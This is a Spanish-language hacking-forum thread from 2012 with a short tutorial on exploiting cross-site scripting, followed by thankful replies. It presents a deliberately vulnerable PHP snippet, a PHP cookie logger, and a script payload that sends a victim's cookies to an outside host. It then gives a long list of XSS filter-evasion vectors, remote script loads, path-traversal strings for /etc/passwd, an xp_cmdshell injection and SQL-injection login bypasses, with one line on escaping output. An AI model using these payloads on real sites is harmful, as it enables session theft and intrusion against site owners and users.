This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Mini Tuto Explotar XSS

  • 4 Replies
  • 6100 Views

0 Members and 1 Guest are viewing this topic.

Online ANTRAX

  • *
  • Administrator
  • Posts: 5830
  • Actividad:
    63.33%
  • Country: ar
  • Reputación 43
  • ANTRAX
  • Twitter: @Underc0de
    • View Profile
    • Underc0de
    • Email

Mini Tuto Explotar XSS

  • on: March 30, 2012, 12:52:55 pm
XSS, Cross site scripting by syndrome

me decidi a hacer este minituto (aunque hay mucho en la red)
pero la idea es dejar mas en claro la practica que la teoria...
ya que en todos los otros tutos aparece mucha teoria pero creo
que no alcanza a quedar totalmente claro.

El XSS es un ataque explotando una inyeccion HTML en un sitio web.
ustedes diran si pero a esto yo ya lo se!, entonces veamos un code
vulnerable y como se explotaria.

You are not allowed to view links. Register or Login

el code contenido dentro de xss.php es

Code: You are not allowed to view links. Register or Login
<?
echo $_GET['id'];
?>

para comprobar su vulnerabilidad lo que tenemos que hacer es
agregarle a la url:

?id=<h1>Vulnerable a xss</h1>

ahora la pregunta mas importante .. como hacer para explotar el xss
para poder robar cookies??
facil de esta manera...

Code: You are not allowed to view links. Register or Login
<?php
$log 
fopen('registro.htm','a');
$ip getenv ('REMOTE_ADDR');
$referrer $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($log'<br>Cookies de '.$referrer.'.<br>IP:'.$ip.'<br>Fecha:'.$fecha.'<br>Cookies:<br>'.$_GET['c'].'<br>');
fclose($log);
?>


una vez tipeado este code solo resta que metamos este otro en la web vulnerable

Code: You are not allowed to view links. Register or Login
<?
<script>window.location='http://www.badinfluence.com.ar/cookies.php?c='+document.cookie;</script>
?>

y listo!! todos felices! menos el admin al que le robaron la cookie
ahora veamos como solucionar este problemirijilla...xD
una de las funciones que recomendaria yo seria esta...
Code: You are not allowed to view links. Register or Login
<?
echo htmlspecialchars($_GET['id']);
?>
lo que hace esa funcion es no interpretar el html pero si lo mostrara ^^

aca les dejo algunas inyecciones que pueden utilizar jugar y divertirse mientras aprenden xss
Code: You are not allowed to view links. Register or Login
'><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
&lt;script&gt;alert('Vulnerable');&lt;/script&gt
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
"><script>alert('Vulnerable')</script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
 \..\..\..\..\..\..\..\..\windows\system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
"<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="   javascript:alert('XSS');">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<br size="&{alert('XSS')}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<IFRAME SRC=javascript:alert('XSS')></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<XML SRC="javascript:alert('XSS');">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.google.com/>link</A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Autor: Syndrome


Offline baron.power

  • *
  • Underc0der
  • Posts: 291
  • Actividad:
    0%
  • Reputación 0
    • View Profile

Re:Mini Tuto Explotar XSS

  • on: April 22, 2012, 07:49:39 pm
excelente, apuntes d ecabecera... saludos y gracias

Offline WARsec

  • *
  • Underc0der
  • Posts: 86
  • Actividad:
    0%
  • Reputación 0
  • "tierra de libertad,casa de los valientes."
    • View Profile

Re:Mini Tuto Explotar XSS

  • on: April 28, 2012, 08:47:18 pm
gracias antrax. :)

Offline wayver

  • *
  • Underc0der
  • Posts: 24
  • Actividad:
    0%
  • Reputación 0
    • View Profile

Re:Mini Tuto Explotar XSS

  • on: October 08, 2012, 12:47:26 am
Para solucionar ese problema yo recomiendo usar expreciones regulares en lugar de la funcion  htmlspecialchars();
detodas formas gran aporte... ;)

Offline zoro248

  • *
  • Underc0der
  • Posts: 238
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • Email

Re:Mini Tuto Explotar XSS

  • on: October 08, 2012, 01:29:18 am
Gracias, me haz aclarado varias dudas, por cierto la pag que pasaste no esta habilitada,